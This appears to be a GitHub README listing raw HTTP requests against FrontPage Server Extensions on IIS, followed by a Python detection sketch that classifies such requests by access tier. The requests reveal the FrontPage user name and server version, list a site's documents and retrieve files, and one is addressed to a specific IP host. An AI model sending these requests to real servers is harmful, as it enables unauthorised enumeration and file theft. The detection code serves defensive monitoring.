deepak0401 / Front-Page-Exploit

HTTP requests of FrontPage exploit


Front-Page-Exploit

On Windows NT and IIS, FrontPage security is basically controlled by the access rights to the three files Admin.dll, Author.dll, and Shtml.dll. These rights respectively determine administration, authoring, and browsing rights. For example, if a remote user is able to read and execute Admin.dll, then that user is able to administer the web site.

The authentication DLLs are structured as follows:

```
Web Root
    _vti_bin
        shtml.dll
        _vti_aut
            author.dll
        _vti_adm
            admin.dll
```

Request 1:

```
POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0
Connection: Keep-Alive
Date: Mon, 23 Mar 2003 00:00:15 GMT
Accept: */*
Host: 208.51.43.138
User-Agent: MSFrontPage/4.0
Content-Type: application/x-www-form-urlencoded
MIME-Version: 1.0
X-Vermeer-Content-Type: application/x-www-form-urlencoded
Content-Length: 59

method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f   <=== Display the frontpage user name
method=server+version%3a4%2e0%2e2%2e2611                    <=== To identify server version
```

=========================================

Request 2:

```
POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
MIME-Version: 1.0
User-Agent: MSFrontPage/4.0
Accept: auth/sicily
Content-Length: 241
Content-Type: application/x-www-form-urlencoded
X-Vermeer-Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive

method=open+service%3a3%2e0%2e2%2e1706&service%5fname=%2f
method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=
```

To retrieve a file, you send this as the POST data:

```
method=get+document%3a3%2e0%2e2%2e1105&service%5fname=&document%5fname=about%2fdefault%2ehtm&old%5ftheme%5fhtml=false&force=true&get%5foption=none&doc%5fversion=
```
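A defender-side sketch, added here and not part of the original repository: it parses a captured request, maps the target DLL to the access tier described above, and decodes the RPC `method` field so FrontPage traffic can be flagged in proxy or web-server captures. The function name `classify`, the tier labels, and the sample requests are assumptions constructed from the requests shown on this page.

```python
import re
from urllib.parse import parse_qs

# Target DLL -> access tier, per the description of the three DLLs on this page.
TIERS = {
    "/_vti_bin/shtml.dll": "browse",
    "/_vti_bin/_vti_aut/author.dll": "author",
    "/_vti_bin/_vti_adm/admin.dll": "admin",
}

# Constructed samples, assembled from the requests shown on this page.
SAMPLE_VERSION = (
    "POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0\r\n"
    "User-Agent: MSFrontPage/4.0\r\n\r\n"
    "method=server+version%3a4%2e0%2e2%2e2611\n"
)
SAMPLE_GET = (
    "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n"
    "User-Agent: MSFrontPage/4.0\r\n\r\n"
    "method=get+document%3a3%2e0%2e2%2e1105&document%5fname=about%2fdefault%2ehtm\n"
)
SAMPLE_BENIGN = "GET /index.htm HTTP/1.1\r\nUser-Agent: Mozilla/4.0\r\n\r\n"

def classify(raw_request):
    """Return a finding for a FrontPage RPC POST, or None for other traffic."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    m = re.match(r"POST\s+(\S+)\s+HTTP/\d\.\d$", lines[0].strip(), re.I)
    path = m.group(1).lower() if m else ""
    tier = next((t for p, t in TIERS.items() if path.startswith(p)), None)
    if tier is None:
        return None
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (l.partition(":") for l in lines[1:])}
    # parse_qs percent-decodes names and values and turns '+' into a space.
    fields = parse_qs(body.strip(), keep_blank_values=True)
    method, _, version = fields.get("method", [""])[0].partition(":")
    return {
        "tier": tier,
        "method": method,
        "client_version": version,
        "document": fields.get("document_name", [None])[0],
        "frontpage_ua": headers.get("user-agent", "").startswith("MSFrontPage/"),
    }

if __name__ == "__main__":
    for sample in (SAMPLE_VERSION, SAMPLE_GET, SAMPLE_BENIGN):
        print(classify(sample))
```

A finding with `tier` of `author` or `admin` from an unauthenticated source is the case the access-rights discussion above is concerned with.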

Reference links:

- http://grox.net/doc/web/frontpage/security.htm
- http://sourceforge.net/apps/trac/w3af/ticket/145813
